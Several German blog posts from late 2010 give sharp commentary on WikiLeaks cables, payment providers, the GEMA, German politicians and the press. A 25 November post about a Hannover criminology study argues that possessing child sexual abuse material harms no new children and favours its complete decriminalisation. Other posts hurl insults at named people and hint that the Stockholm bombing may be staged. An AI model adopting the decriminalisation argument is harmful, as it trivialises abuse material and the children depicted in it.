Kleiner Lacher am Rande: beim CCC kam eine Anfrage aus der Branche rein, ob es sowas wie das Netzwerk Recherche aber "ohne den Leyendecker" gäbe.
Mir ist ja eh nicht klar, was die in diesem Netzwerk Recherche eigentlich groß recherchiert haben in ihrer Karriere. Ich habe ja in meinem Leben die Erfahrung gemacht, dass wenn jemand im Namen etwas an sich offensichtliches erwähnt, dann meistens aus dem Grund, weil sonst niemand gemerkt hätte, dass sie das sind/tun, weil es eben auch so ist, dass sie das nicht sind/tun. Vergleiche auch "Kompetenzzentrum", "Bild-Zeitung", "Gesundheitskarte".

Sun Dec 12 2010

[l] Die Postfinance in der Schweiz könnte jetzt Ärger kriegen. Dass sie so offen kommuniziert haben, dass sie Julians Konto zugemacht haben, hat eventuell das Postgeheimnis verletzt. Das wird jetzt jedenfalls gerade untersucht. (Danke, Mario)

Sat Dec 11 2010

[l] In Stockholm ist eine Autobombe hochgegangen. Na ob das reicht, um die Bevölkerung von der Julian-Assange-Nummer abzulenken?
Hoffen wir mal, dass sie da jetzt keinen "Free Julian"-Aufkleber "finden". Dann wäre auch klar, wer das warum gemacht hat. Und vermutlich würde es funktionieren.

Wed Dec 8 2010

[l] Paypal erklärt sich: das US-Außenministerium hatte einen offenen Brief an Wikileaks geschickt, dass was sie tun "illegal" sei, und daher haben sie der Wau-Holland-Stiftung den Account zugemacht. Auf DER Basis entscheiden diese Leute darüber, ob Kunden an ihr Geld kommen oder nicht? Offene Briefe im Internet?!?
Update: beim Guardian liest sich das nach einer direkteren Intervention.

Tue Dec 7 2010

[l] Bei den Cloud Computing-Sprallos kommt langsam die Erkenntnis an, dass auf Amazon kein Verlass ist. Wenn die mal eben Wikileaks abschalten können, wer sagt dann, dass die nicht auch dein Business mal eben abdrehen, wenn ihnen danach ist?
Gut gemacht, Julian.

Mon Dec 6 2010

[l] Erinnert ihr euch noch an die Geschichten vom Klimagipfel in Kopenhagen? Als es hieß, die armen Amis, die hätten ja alles getan, Obama sei noch persönlich angereist dafür, und dann hätten die bösen Chinesen das alles kaputtgemacht? Ja?
Nun, dank Wikileaks wissen wir heute mehr.
Die Amis haben damals hinter den Kulissen manipuliert, gedroht, spioniert und sabotiert, wie sie nur konnten.
The US diplomatic cables reveal how the US seeks dirt on nations opposed to its approach to tackling global warming; how financial and other aid is used by countries to gain political backing; how distrust, broken promises and creative accounting dog negotiations; and how the US mounted a secret global diplomatic offensive to overwhelm opposition to the controversial "Copenhagen accord", the unofficial document that emerged from the ruins of the Copenhagen climate change summit in 2009.
Da sieht man mal, wie erfolgreich Regierungen die Welt belügen und bescheißen können. Und wie wichtig es ist, etwas wie Wikileaks zu haben. Sonst würden wir heute noch glauben, die Chinesen seien die Bösen.

Sun Dec 5 2010

[l] So kann das auch gehen: Island gibt sich eine neue Verfassung; sie wird von 31 direkt gewählten Bürgern gemacht.
An election tomorrow will select up to 31 citizens who will form the constitutional assembly that will convene early next year. Those elected will receive a salary equal to that of Iceland's MPs while the review takes place.
Wow.
Berghildur Erla Bergthorsdottir, the spokeswoman for the organising committee, said: "This is the first time in the history of the world that a nation's constitution is reviewed in such a way."
Na aber hallo!

Sat Dec 4 2010

[l] Ist ja nicht wahr! Paypal hat der Wau-Holland-Stiftung den Account zugemacht! Die Wau-Holland-Stiftung ist eine gemeinnützige Stiftung aus dem CCC-Dunstkreis, die u.a. Spenden sammelt und zweckgebunden (!) an Wikileaks weitergibt. Wenn Wikileaks also tatsächlich eine kriminelle Vereinigung und nicht gemeinnützig ist, oder wenn sich da nur jemand bereichern will, dann ist die Wau-Holland-Stiftung die perfekte Waffe dagegen, weil Wikileaks ja weiß, wieviel Geld da für sie eingegangen ist, aber sie immer erst rankommen, nachdem sie nachgewiesen haben, dass das Geld für eine satzungskonforme Sache ist. Kurz gesagt: da kann man nicht mal eben 10 Euro abheben und sich damit ne Currywurst holen.
Wobei wohl geringe Gehälter rechtlich OK wären, aber AFAIK nimmt Wikileaks das nicht in Anspruch.
Will sagen: unkrimineller als die Wau-Holland-Stiftung geht gar nicht. Da hat Paypal VOLL ins Klo gegriffen. Ich kann nicht sagen, dass ich da jetzt überrascht bin. Paypal hatte ja noch nie einen besonders guten Ruf. Ich sehe da jetzt auch alle meine Vorurteile bestätigt. Mich hat ja nur immer gewundert, wie diese Leute eine Banklizenz in Deutschland kriegen konnten. Sachen wie das snid der Grund, wieso ich nicht per Paypal Spenden fürs Blog oder Alternativlos entgegennehme bisher. Da kann man nie wissen, ob man das Geld auch tatsächlich ausgezahlt kriegt am Ende.

Fri Dec 3 2010

[l] Solange wir nicht verändern, wie bei uns Gesetze gemacht werden, wird das immer nur noch schlimmer bei uns. Solange die Experten aus formalen Gründen einladen aber dann ignorieren, solange wird das nichts mit diesem Land. Aktuell: Sicherheitsverwahrung.
Selten habe ich eine solche Ignoranz im Rahmen eines Gesetzgebungsverfahrens erlebt, aber vielleicht sind nur meine Anforderungen an Debatte und Gesetzgebung andere? Verwundert hat mich dann allerdings schon, dass alle Redner/innen außer mir am gestrigen Tage dieses Gesetzgebungsverfahren als vorbildlich darstellten.
Ich hab das ja nur aus Sicht eines Experten erlebt und hatte da genau den selben Eindruck, dass wir da nur aus formalen Gründen angehört werden. Danach läuft es offensichtlich genau so weiter.

Thu Dec 2 2010

[l] Die NASA hat für heute eine Pressekonferenz gemacht, bei der die Gemüter hochschlugen. Die Ufologen rechneten damit, kleine grüne Männchen präsentiert zu kriegen. Oder zumindest Leben auf dem Mars. Am Ende war es eine neue Bakterienart in einem See in Kalifornien. Der See ist giftig. Was diese Bakterien jetzt besonders macht, ist dass sie nicht Phosphor sondern Arsen benutzen. Das ist deshalb so beeindruckend, weil die DNA aller anderen bekannten Lebewesen Phosphor beinhaltet. Jetzt haben wir also die erste Lebensform gefunden, bei der das nicht so ist. Das ist eine echt große Entdeckung, auch wenn es keine grünen Männchen sind.

Tue Nov 30 2010

[l] Wenig überraschend kommt eine juristische Analyse des JMStV zu dem Ergebnis, dass das Pfusch ist, von inkompetenten Idioten gemacht. Anwälte drücken sich ja üblicherweise eher zurückhaltend und vorsichtig aus, insofern ist das schon geradezu ein Schlag ins Gesicht, was dieser Kommentator schreibt.

Mon Nov 29 2010

[l] [MP4-Videolink] Westerwelle ist unglücklich über Wikileaks.
Hier wird mit rechtswidrig, kriminell erworbenen Daten Kasse gemacht. Darum geht es.
Aha. Soso. Kasse? Wer macht denn da Kasse? Oh, der Spiegel? Ja, das stimmt natürlich. Gleich zumachen, den Laden. Frechheit! Auf Kosten unseres Außenministers!
Ich bin mir sicher, die Unzufriedenheit hat nichts, aber auch GAR nichts damit zu tun, dass Westerwelle in den Memos als inkompetente Pfeife entlarvt wird. Das hätte er genau so gesehen, wenn sie ihn gelobt hätten!1!!
Oh und wo wir gerade bei unzufriedenen Journalisten waren: auch die Süddeutsche in Form von Leyendecker ist unzufrieden [mp3] und natürlich die Zeit auch. Aber eines ist ja wohl klar: mit Neid und Missgunst hat das NICHTS, aber auch GAR NICHTS zu tun!1!! Die wären genauso aufgebracht, wenn man statt des ehemaligen Nachrichtenmagazins sie hätte mitleaken lassen!!1!
Es gerüchtet übrigens, dass Washington Post und New York Times sich um den Leak bemüht hätten, aber keine Daten gekriegt haben, weil sie über Julian Assange nicht als Helden sondern kritisch berichtet haben. Ich fürchte fast, dass ich das Gerücht soweit als glaubwürdig einschätzen muss.
Update: Boah dieser Leyendecker… ich hoffe mal, dass die da einem Stimmenimitator aufgesessen sind. Der redet sich da im Kopf und Kragen. Er vergleicht Wikileaks mit Massenvernichtungswaffen und bringt dann so Höhepunkte wie
Die stellen unkommentiert Material rein und jeder kann sich ein Bild machen
Äh, ja, … genau! Das ist die Idee! Wieso ist das jetzt furchtbar? Weil die Leute nicht mehr die Süddeutsche kaufen müssen, um eine Meinung vorgesetzt zu kriegen? Mann Mann Mann.
wie eine Regierung dann zu Einschätzungen kommt und danach ihre Politik richtet, das muss ich nicht immer im Detail wissen.
Wie meinen?!? Wer denn bitte sonst?! ER muss das nicht wissen? Wenn er jetzt gesagt hätte, ich muss das nicht wissen, dann hätte man noch Machterhalt und Profitgier als Motiv unterstellen können, aber wenn er sagt, er muss das nicht wissen, und er sieht sich als investigativer Journalist… das ist ja wohl eine Bankrotterklärung sondergleichen. Krass. Tja, Süddeutsche, das war's dann wohl.
Oh und dieser Greiner kloppt da auch einen Rohrkrepierer nach dem nächsten raus. Der hat überhaupt nicht verstanden, was Wikileaks ist. Der kritisiert da in einem fort, dass Wikileaks nicht zu jedem Botschaftsmemo die Gegenposition der Botschaft und der befragten Quellen mitliefert. Wikileaks ist keine Zeitung, Herr Greiner! Das ist ja gerade der Vorteil! Dort hat niemand über das Material geguckt und die Sachen rausgeschmissen, die er für unglaubwürdig hielt, aus welchen Gründen auch immer.
Und hier noch ein Leyendecker:
… als ob das, was in der Depesche ist, irgendeinen Wahrheitsgehalt hat, davon geht man ja offenbar aus
Äh … ja. Davon geht man aus. Nachdem die Amerikaner den Schritt gegangen haben, die betroffenen Regierungen davor zu warnen, dass da demnächst peinliche Daten über sie rauskommen. Und dass sie jetzt nicht hingehen und behaupten, dass das alles gefälscht sei. Das wäre doch die erste offensichtliche Gegenstrategie bei sowas! Jemand zuhause, Herr Leyendecker?
Ich bin ja schockiert, dass Greiner und Leyendecker Wikileaks ernsthaft vorwerfen, sie hätten ihnen nicht auch noch ihre journalistische Arbeit der Quellenprüfung und -bewertung abgenommen. Das sagt mir ja mehr über den Journalismus in Deutschland als ich an der Stelle wissen wollte. Die sind offenbar gar nicht mehr gewohnt, Rohdaten reinzukriegen und selber bewerten zu müssen. Alles, was die publizieren, ist offensichtlich schon vorgedacht und -bewertet. Krass. Und dann wundert man sich auch nicht mehr, wenn der Leyendecker fragt, wie gefährlich das Internet eigentlich sei. Weia.
Ein Höhepunkt ist auch, als Leyendecker da plötzlich in das Territorium von Verschwörungstheorien absackt und meint, das sei alles purer Antiamerikanismus, was Wikileaks da betreibe. Tja, Herr Leyendecker, da hatten sie aber mit Herrn Kompa den falschen Gesprächspartner, der hat auf dem Gebiet mehr Erfahrung :-)
Hier ist noch ein Greiner-Highlight auf den Einwurf, dass investigativer Journalismus ja brotlos und aussterbend sei:
Wenn etwas wenig nutzt [investigativer Journalismus], muss ich es nicht durch etwas absolut Nutzloses [Wikileaks] ersetzen!
Ab 31:00 wird es auch nochmal lustig, als dieser Greiner dem staunenden Publikum erklärt: neinnein, das ist keine Spionage, wenn jemand Informationen aus vertraulichen Gesprächen an eine fremde Macht verrät. Äh, … sondern?
[l] Einen noch zu den Arabern: König Abdullah von Saudi-Arabien schlägt Obama vor, den Guantanamo-Insassen RFID-Tags einzupflanzen. Begründung: damit habe er bei seinen Pferden und Falken gute Erfahrungen gemacht.
HOW TO TRACK DETAINEES: "I've just thought of something," the King added, and proposed implanting detainees with an electronic chip containing information about them and allowing their movements to be tracked with Bluetooth. This was done with horses and falcons, the King said.
Was tut man als Diplomat, wenn einem so ein menschenverachtender Vorschlag gemacht wird? Auslachen? Aufstehen und gehen? Nein, man sagt die Wahrheit:
Brennan replied, "horses don't have good lawyers," and that such a proposal would face legal hurdles in the U.S., but agreed that keeping track of detainees was an extremely important issue that he would review with appropriate officials when he returned to the United States.
Mit anderen Worten: klar würden wir denen RFID-Tracker implantieren, wenn nicht immer diese nervigen Anwälte im Wege stünden!1!! (via)
[l] Weiteres schönes Westerwelle-Kabel:
Westerwelle still cuts a good image in meetings and in the press here, even though his party continues a bout of free fall in the polls. His ministry, though, still wonders (privately to us) where he gets his policy direction from.
Bwahahahaha, da sind sie nicht die einzigen :-)
Der Rest von dem Memo ist auch sehr instruktiv. Da gab es z.B. die Münchner Sicherheitskonferenz, bei der ein Iraner auf der Gästeliste stand, der explizit mit Westerwelle reden wollte. Die Amis haben sich Sorgen gemacht und da mal angefragt. Westerwelle hat natürlich sofort Rede und Antwort gestanden, wie es sich für einen transatlantischen Speichellecker gehört. Ist ja nicht so, als wäre der Mann Außenminister in einem souveränen Land oder so. Hier ist, was Westerwelle gesagt hat:
In any case, Westerwelle said his position was exactly the same as the U.S. on Iran, and he would share the results of any meeting with Mottaki, if it took place.
Natürlich! Der ist schließlich unser Außenminister! Was liegt da näher, als dem Iran gegenüber den US-Proxy zu geben!
Oh und noch was zu Westerwelles diplomatischen Fähigkeiten. Der ist nach China gefahren, um über Sanktionen gegen den Iran zu verhandeln. China bezieht ihr Öls vom Iran. Sanktionen sind da völlig undenkbar. Aber Westerwelle geht da hin und schlägt das vor.
However, he observed that China was "hesitant," or even in opposition to sanctions. Reflecting on his recent visit to China, Westerwelle said he had not perceived any "good will" there at present.
Nee, echt jetzt? Was ne Überraschung!1!! Einmal mit Profis arbeiten…
He said he would ask Yang again about Iran and then share the results with the U.S.
Guuuuut gemacht, Guido *leckerlihinwerf* *tätschel* Der beste Schoßhund, den die Amis je hatten!
Immerhin an einer Stelle ist er nicht völlig blind:
He said he had been in France February 4 for a joint cabinet meeting, but that nothing substantive came of it. He observed that one never really knew what was going to happen with Sarkozy involved.
[l] Die Anne Will-Sendung gestern ist spontan zu einer Wikileaks-Sondersendung umgebastelt worden, mit … Sascha Lobo als Internet-Leak-Spezialisten mit Wikileaks-Insider-Knowhow.
Wer jetzt denkt, boah, typisch Anne Will-Niveau, das kann ja nur grottenschlecht sein, der hat natürlich Recht. Weitere Gäste sind ein Unsympath namens Klaus Kocks, der PR und Marktforschung macht und es "Meinungsumfragen" nennt, und offenbar auch mal VW-Vorstand war. Lange habe ich in keiner Talkshow mehr jemanden gesehen, der mir auf Anhieb so dermaßen unsympathisch war wie dieser Typ. Boah, ekelig. Kennt ihr das, wenn ihr euch spontan die Hände und das Gesicht waschen gehen müsst? So ging mir das gerade.
Ansonsten sitzt da der Chefredakteur des Tagesspiegel, Stephan-Andreas Casdorff, der Ex-US-Botschafter John Kornblum und Dirk Niebel von der FDP (offensichtlich weil die Botschaftsdepeschen zu seiner Ernennung als Minister trotz Euphemismus immer noch eher zurückhaltend in ihrer Beurteilung seiner Kompetenz waren).
In dieser Runde hätte ich mir am meisten von dem Tagesspiegel-Typen erwartet, aber der bleibt unter den von Giovanni di Lorenzo hoch gesteckten Erwartungen zurück. Es ist ziemlich offensichtlich, dass keiner von denen da einen Einblick in die Depeschen hatte, außer dem Kornblum und der sagt natürlich nichts. Daher möchte ich den auch mal außer Konkurrenz laufen lassen, auch wenn er wie immer eine gute Figur gemacht hat, besonnen und sachlich argumentiert hat und sich keine Schnitzer geleistet hat.
Und wer hat in dieser Popcorn-Debatte die anderen in Grund und Boden geredet? Sascha Lobo!
Soweit sind wir inzwischen im Deutschen Fernsehen, dass sich das Angucken einer Sendung deswegen lohnt, weil Sascha Lobo als Talkgast eingeladen ist.
Falls jemand mal selber gucken will: liegt in der Mediathek.
Niebel redet sich da um Kopf und Kragen. Der argumentiert da, es gab keinen Informanten, und die Daten seien eh alle öffentlich gewesen, aber sie seien gestohlen und das war Geheimnisverrat. Den Widerspruch klärt er so auf, dass die US-Botschaft ja einen Vertraulichkeitsstempel draufgemacht hat vor dem Weiterleiten. Oh und im Übrigen sind Botschaftsdepeschen fundamental das Selbe wie Patientendaten von der Gesundheitskarte und eine Frage des Datenschutzes!1!! Gut, dass der nur für Entwicklungshilfe zuständig ist, und nicht für Justiz oder Polizei. Nicht auszudenken, wenn so jemand tatsächlich was entscheiden könnte in diesem Land.
[l] Cablegate hat auch was zur Verräterpartei: Guttenberg hat sich bei den Amis ausgeheult, dass er keine weiteren Truppen an den Hindukusch schicken kann. Aber nicht wegen der SPD, sondern … wegen Westerwelle!
Defense Minister zu Guttenberg revealed in a February 3 meeting with Ambassador Murphy that coalition partner FM Westerwelle — not the opposition Social Democratic Party (SPD) — had been the single biggest obstacle to the government seeking a bigger increase in German troops for Afghanistan.
Damit ist hoffentlich endgültig klar, dass auch der letzte Zweifel ausgeräumt ist, dass die SPD unwählbar ist. Mit der Schröder-Irakkrieg-Ablehnung sind ja die Apologeten umhergezogen in letzter Zeit. Wie man hier deutlich sehen kann: zu Unrecht.
Und erschütternderweise muss man konstatieren, dass die FDP zwar widerliche Positionen vertritt, aber sich immerhin zumindest partiell an Absprachen gebunden fühlt. Im Gegensatz zu den Sozis. Hat man ja auch bei den Hoteliers gesehen, da gab es ja auch keine Argumente dafür, ausser dass sie es denen vor der Wahl zugesagt hatten.
Wer jetzt denkt, hey, der Fefe macht FDP-Werbung?! Keine Sorge, natürlich ging es Westerwelle nicht um die Sache, sondern er wollte nur dem Guttenberg mal zeigen, wer in der Koalition die Hosen an hat:
While Westerwelle has portrayed his skepticism about additional troops as principled, it was also motivated by a desire to put zu Guttenberg "in his place."
Hahaha, die Bürgerrechtspartei, hahaha. Suuuuper, FDP. Was sind das nur alles für Widerlinge. Ich frage mich ja, was der Westerwelle macht, wenn er eines Tages aufwacht, und merkt, dass er da versehentlich etwas im Sinne des Volkes gemacht hat. Etwas, was die Wähler wirklich wollten. Ob der mit so einer Last weitermachen kann dann? Oder vielleicht kriegt der ja auch immer Medikamente verabreicht, damit dieser Moment nicht eintritt.
[l] In Australien kostet auf-Wikileaks-linken $11.000 Dollar pro Tag.
Denn Wikileaks ist dort auf einer "schwarzen Listen".
Wo wir gerade bei schwarzen Listen waren: Herzlich Willkommen, Australien, auf meiner schwarzen Liste.
Update: DIE Drohung war zu viel für Australien, sie haben das rückgängig gemacht, Wikileaks ist nicht mehr verboten. :-)

Sun Nov 28 2010

[l] Und noch ein GEMA-Opfer: Das St. Martins Komitee Monheim wurde von der GEMA abgemahnt, weil sie einen Liedtext im Internet runterladbar hatten.
Was muss dieser widerliche Laden eigentlich noch tun, bevor er endlich zugemacht wird?
Ich wünsche mir da eine ordentliche Kampagne, wie auch gerade gegen die TSA läuft. Die TSA hat wenigstens eine (schlechte) Ausrede für ihr schändliches Tun. Die GEMA nicht. Mit dem was die tun ist genau niemandem mit geholfen.

Fri Nov 26 2010

[l] Wollt ihr mal was ganz furchtbares sehen? So richtig abgrundtief gruselig? Halloween-Material? Die GEMA veröffentlicht ein Positionspapier mit 12 Thesen. Wenig überraschend hat meine Forderung nach GEMA-Auflösung dort keinen Widerhall gefunden. Aber es geht schon los mit Sätzen wie
Wenn es nicht mehr möglich ist, von kreativer Arbeit leben zu können, […]
Haben die mal aus dem Fenster geguckt? Oder hat deren Realitätsabschirmungsbunker keine Fenster?
Die Forderungen sind auch entsprechend. Und das alles in einem Neusprech-Feuerwerk vom feinsten. Ich frage mich ja, ob die GEMA tatsächlich glaubt, irgendeinem Künstler geholfen zu haben, indem sie Youtube kaputtgemacht haben.
Ich linke auf das Papier, weil die an mehreren Stellen Umerziehung der Menschen fordern, bei Punkt 4 sogar Indoktrination von Kindern an den Schulen. Dem müssen wir selbstverständlich entschieden entgegentreten und endlich diesen Moloch von einer Geldverschwendungsmaschine zumachen, die Kindergärten, Weihnachtsmärkte und Youtube drangsalieren.
Besonders witzig finde ich Regel 6. Da geht es um verwaiste und vergriffene Werke. Die naheliegende Forderung an der Stelle wäre, dass die dann einfach gemeinfrei werden. Aber das ist selbstverständlich nicht, was die GEMA fordert. Deren Forderung ist so absurd, dass ich sie mal wiedergeben will:
Hier ist eine gesetzliche Regelung dringend erforderlich. Diese sollte vorsehen, dass zunächst eine sorgfältige Suche nach dem Rechteinhaber durchzuführen ist. Bleibt die Suche erfolglos, so sollte gegen Zahlung einer angemessenen Vergütung eine Lizensierung durch Verwertungsgesellschaften ermöglicht werden.
Äh, wie meinen?! Un-glaub-lich! Hey, vielleicht sollte ich das auch einfach fordern. Wenn ich ein Werk für verwaist halte, dann übernehme ich einfach die Rechte und kassiere bei der gesamten Bevölkerung ab!1!! Finde ich genau so "naheliegend" wie dass das die Verwertungsgesellschaften tun.
Oh, und die üblichen Verdächtigen sind natürlich auch dabei, Three Strikes (7) und dass sie Provider in Haftung nehmen wollen (8). Oh und natürlich ein "Leistungsschutzrecht für Verleger". Da frage ich mich ja immer, was für eine Leistung Verleger eigentlich angeblich erbringen.

Thu Nov 25 2010

[l] Krass, wir haben uns gerade noch über das "Kommittee zur Wiederwahl von Angela Merkel" lustig gemacht, weil es sowas ja in den USA gibt, und die dann immer die üblen Negativ-Spots finanzieren. Stellt sich raus: bei uns gibt es sowas auch, Stichwort "Wähler für den Wechsel". CDU, natürlich. Die sind ja immer sehr, äh, innovativ, wenn es um Wahlkampf- und Parteienfinanzierung geht. (Danke, Markus)
[l] Ich hoffe ja immer, dass meine Leser meinen Quellen-Links hinterherklicken und hatte gestern auf diesen Heise-Artikel verlinkt, mich aber nur auf den ersten Absatz bezogen. Hand aufs Herz, wer hat den Rest auch gelesen? Für den Fall, dass jemand das nicht getan hat, weise ich nochmal explizit darauf hin, was dort noch so steht.
Die Uni Hannover hat eine Studie zum Deliktfeld Kinderpornographie gemacht.
Ergebnisse:
1. das Web spielt als Verbreitungsweg nur eine untergeordnete Rolle.
2. In nur 15% der Fälle von "Verschaffen von Kinderpornographie" ist Geld bezahlt worden, in nur einem Fall hat jemand Geld erhalten. Von einem großen Markt kann also keine Rede sein.
3. Vorratsdatenspeicherung hätte in keinem der analysierten Fälle die Ermittlungen voranbringen können.
Außerdem:
47 der 81 bisher untersuchten Verfahren wurden mittlerweile eingestellt, weil sich kein hinreichender Tatverdacht ergeben hat. 18 Urteile sind ergangen, 11 der Beschuldigten erhielten eine Freiheitsstrafe zur Bewährung, keiner musste bislang in Haft.
Für Schünemann ist das natürlich ein Zeichen dafür, dass das Strafmaß zu gering ist. Für mich ist das ein Zeichen, dass es da keine ernstzunehmende Kriminalität gibt, bei denen sie Leute erwischt haben. Das Strafmaß für die Verbreitung und die Beschaffung / den Besitz ist ja geringer als das für den Missbrauch von Kindern zwecks Erstellung von Pornographie. Da gibt es eine Mindesthaftstrafe von 3 Monaten, in besonders schweren Fällen von nicht unter einem Jahr. Offensichtlich tritt das in der Praxis nicht auf, sondern was unsere Polizei da mit monströsem Aufwand verfolgt sind Konsumenten von einschlägigem Material. Das ist zwar widerlich und furchtbar, aber es werden offensichtlich keine neuen Kinder dafür missbraucht, sondern das sind alles alte Fotos. Und unter den Rahmenbedingungen wäre ich sogar für eine völlige Dekriminalisierung, denn mir ist es lieber, wenn die ihre Triebe an alten Bildern abreagieren als wenn sie da nicht mehr rankommen und sich dann echte Kinder zum Missbrauchen suchen müssen.
Update: Achtet auch auf die tollen Synergieeffekte zu dieser Meldung. Die Statistik wird sich zu ihren Gunsten ändern, wenn auch Erwachsenennacktbilder mitzählen.
[l] Und wo wir gerade beim ehemaligen Nachrichtenmagazin waren: ich habe heute ein paar Interview-Fragen beantwortet. Eine von denen war, wieso und seit wann die "ehemalig" sind. Bei der Gelegenheit habe ich deren Homepage im Browser aufgemacht, und da waren drei Meldungen, die man als "Politik" werten könnte. Eine Pro-Merkel-Meldung ohne neue Erkenntnisse, die ich mal als CDU-Wahlkampf werten würde, eine Contra-SPD über angebliche Zerstrittenheit bei der SPD, die ich auch mal als Wahlkampf werten würde, und eine über Irland, ebenfalls ohne neue Erkenntnisse. Bei den älteren Meldungen findet sich dann noch "Forsa-Umfrage: Union erreicht besten Wert seit sechs Monaten", also auch CDU-Wahlkampf. Krass. Die TUN nicht mal mehr so, als seien sie überparteilich und unparteiisch.
Ich wollte da schon übellaunig das Tab schließen, da fiel mir der furchtbarste, transparenteste Wahlkampf-Propaganda-Mist auf, den ich seit langem gesehen habe: "Thomas de Maizière - Minister für höhere Aufgaben".
Der Artikel ist schon übel genug, ich werde gleich ein paar besonders hocharomatische Kuhfladen zitieren, aber guckt euch mal das Heiligenbild an, das sie da von Karl haben! Heiligenschein, elegischer-verklärt in die Ferne blickend, mit den Händen in Heiland-Haltung… das ist kaum toppbar.
Ich habe ja gestern schon in Alternativlos 9 gemeckert, dass Journalismus sich der Mode-und-Promi-Tratsch-Presse annähert, aber ich meinte damit eher den News-Cycle, nicht den Inhalt. Der Inhalt von diesem CDU-Wahlkampfbeitrag (nach der Guttenberg-Heldenverehrung kann man das nicht mehr anders bezeichnen, finde ich) steigert sich von Höhepunkt
Seinen monoton-sonoren Tonfall kennt mittlerweile das ganze Land. Der 56-Jährige verleiht dem Kampf gegen den Terror Stimme und Gesicht - er, nicht die Kanzlerin, nicht der Bundespräsident.
zu Höhepunkt
Sein Motto: "Nichts allzu sehr." Einen "Handwerksmeister der Regierungskunst" nannte er sich, den "ersten Gehilfen" für die Kanzlerin.
zu Höhepunkt
Stark sei nicht, "wer lauthals etwas fordert, stark ist, wer leise etwas durchsetzt". Das war so ein Satz aus seinen ersten Amtswochen im vergangenen Jahr. Er habe sich entschlossen, ab und zu mal auf die abstrakte Terrorgefahr hinzuweisen, nicht aber ständige Warnungen auszustoßen, sagte er.
zu Höhepunkt.
Die Frage ist vielmehr: Kann Thomas de Maizière Kanzler? Er, der als spröde geltende, kühle Jurist, der Mann der Verwaltung?
Da kommt man aus dem Brechreiz gar nicht mehr raus! Wenn die noch weniger Abstand hätten, müsste man sie operativ aus seinem Dünndarm entfernen!
Das ist wie Justin-Bieber-Berichterstattung in der Bravo! Heldenverehrung ohne Reflektion, ohne Abstand, ohne eigene geistige Leistung. Wie diese japanischen TV-Idols. Ja, Idol ist das richtige Word dafür. Das ist das goldene Kalb, das da verehrt wird.
Liebe "Redakteure" beim Spiegel: der Mann ist Angestellter. Unser Angestellter. Der arbeitet für uns. Um Dinge zu tun, die uns betreffen. Wenn wir mit dem was tun sollten, dann ist es prüfen, ob der seine Arbeit gut macht. Nicht so Teenie-Onanier-Fanboi-Scheiße. Ernsthaft, als ich das las, dachte ich kurz daran, euch eine Kleenex-Packung zu schicken. Da hört man während der Lektüre im Hintergrund jemanden schwer atmen, wenn man die Ohren spitzt. So etwas furchtbares habe ich lange nicht mehr gelesen. Das wäre selbst für Gruner+Jahr völlig unakzeptabel, nicht einmal der Focus ist so unsubtil in seinem CDU-Wahlkampf!
Ihr solltet euch was schämen!
Ich geh jetzt erstmal Zähneputzen, um den Geschmack wegzukriegen.

Wed Nov 24 2010

[l] Wow, cool: Bing partnert mit Openstreetmap, nimmt deren Straßendaten und gibt ihnen ihre Luftaufnahmen. Das ist ja mal ein großer Deal für Openstreetmap, sehr erfreulich. Und Microsoft macht mit Google, was Google vorher mit Microsoft gemacht hat: deren Geschäftsbasis zur freien Massenware machen. Das ist ein Kampf, bei dem es nur Gewinner geben kann :-)
[l] Die Gewerkschaften des Medien- und Unterhaltungssektors stehen auf der falschen Seite der Barrikaden.
Im Grunde kann man das Papier auf die zentrale Forderung reduzieren: Totalüberwachung jeglichen Netzverkehrs mit Hilfe von Deep-Packet-Inspection-Technologien zur Filterung von Urheberrechtsverletzungen.
Na dann sterbt mal ruhig weiter aus. Deutscher Teilnehmer in diesem Dachverband ist verdi. Falls da noch jemand Mitglied sein sollte.
Update: Einer meiner Leser hat mal innerhalb von ver.di Stunk gemacht und kriegte folgende Stellungnahme:
ver.di distanziert sich von den Ausführungen der UNI zur Netzneutralität.
Das müssten sie jetzt nur noch ein bisschen offensiver kommunizieren, und auch innerhalb der UNI dafür sorgen, dass nicht so ein Mist publiziert wird.

Tue Nov 23 2010

[l] Markus Kompa hat ein paar schöne Details über Uwe Barschel herausgekramt. Alleine die Liste der ~~Drogen~~ Medikamente, die der Mann eingeworfen hat, beeindruckt. Das wird die chemische Untersuchung der Leiche nicht ganz einfach gemacht haben. (Markus war unser Gast in Alternativlos 8)

Mon Nov 22 2010

[l] Hahahaha, die US Air Force hat den Tanker-Deal noch übler verkackt als bisher angenommen. Da haben ja Boeing und Airbus als Konkurrenten gegeneinander geboten. Und was hat die Air Force gemacht? Kommt ihr nie drauf!
Boeing received detailed proprietary information about the EADS bid; corresponding information was given to EADS North America concerning the Boeing bid.
Na DAS ist ja mal schlau! Die Air Force hat denen jeweils das Angebot des anderen zugesteckt. Versehentlich, natürlich, denn die sind vertraulich, solche Angebote. So vertraulich, dass sie eines der Hauptziele von Wirtschaftsspionage sind.
Die BESTEN der BESTEN der BESTEN, SIR!

Fri Nov 19 2010

[l] Ich frage mich ja immer, wozu wir eigentlich eine Regulierungsbehörde haben, wenn die Telcos dann trotzdem mit sowas hier durchkommen: O2 versteht unter "Flatrate", dass Kunden mit mehr als 30 Minuten Telefonie und 16 SMS pro Tag gekündigt werden. Die Telcos verarschen uns doch nach Strich und Faden, und das seit Jahren! Es kostet die Nasa weniger, mit dem Mond zu kommunizieren, als mich Datenübertragung per SMS innerhalb Berlins kostet!
Die Ausrede dafür ist, dass unsere Regierung ja damals bei der UMTS-Auktion der Telcos nach Strich und Faden verarscht hat, und deshalb ist das ja gerecht.
Finde ich nicht. Ich finde, dass unsere Regulierungsbehörde mal der Abzocke einen Riegel vorschieben muss. Am Anfang von GSM waren SMSsen kostenlos. Ja, kostenlos! Die haben nichts gekostet! Und die Telcos haben das überlebt! Das kostet nur Geld, weil denen ihre schrottigen SMS-Gateways unter der Last zusammengebrochen sind, und daher haben sie Kosten für SMS eingeführt. Und als sie gemerkt haben, dass die Kunden in einer Notlage sind und das zahlen, da haben sie das beibehalten.
Update: O2 macht einen (Fall-)Rückzieher. Das waren doch nur Richtwerte und überhaupt ist bisher niemand abgemahnt oder gekündigt worden!1!!

Thu Nov 18 2010

[l] Boah ich könnte kotzen, das wird immer übler. Jemand hat Schünemann (!) ein Mikrofon hingehalten und er hat was von einer steigenden Bedrohung durch deutschstämmige Islamisten reingefaselt. Hat er ja neulich schon gesagt, als es um Fußfesseln für Islamisten ging. Und De Maiziere holt ernsthaft Mumbai aus der Mottenkiste.
Ich fürchte, wir werden da mal aktiver werden müssen.
Daher hier meine Forderungen.
1. Ich fordere Fußfesseln für Innenpolitiker und Handfesseln für Mitglieder in Schützenvereinen.
